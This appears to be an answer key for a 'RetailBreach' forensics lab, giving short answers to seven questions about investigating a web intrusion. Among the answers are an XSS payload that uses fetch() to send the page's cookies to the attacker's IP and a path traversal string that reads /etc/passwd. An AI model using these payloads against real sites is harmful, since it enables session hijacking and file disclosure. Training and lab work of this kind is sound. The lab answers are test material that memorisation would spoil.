RetailBreach Lab
Last updated
Last updated
Q1) In the realm of cybersecurity, identifying the attacker's IP address is pivotal for mapping the attack's scope and strategizing an effective response. What is the IP address associated with the attacker?
Answer: 111.224.180.128
Q2) Directory brute-forcing tools are known to be used by attackers seeking to uncover hidden paths within web applications. Which tool was employed by the attacker to perform directory brute-forcing?
Answer: gobuster
Q3) Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Could you specify the XSS payload that was utilized by the attacker to compromise the web application's integrity?
Answer: fetch('http://111.224.180.128/' + document.cookie);
Q4) Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?
Answer: 29-03-2024 12:09:50
Q5) The act of stealing a session token via XSS is a critical security breach, enabling unauthorized access. Can you provide the session token acquired and used by the attacker for unauthorized access?
Answer: lqkctf24s9h9lg67teu8uevn3q
Q6) Identifying which scripts have been exploited is a key step in mitigating vulnerabilities within a web application. What is the name of the script that was exploited by the attacker?
Answer: log_viewer.php
Q7) Exploiting vulnerabilities to access sensitive system files is a common tactic among attackers. Can you identify the payload that was used by the attacker to gain access to a sensitive system file?
Answer: ../../../../../etc/passwd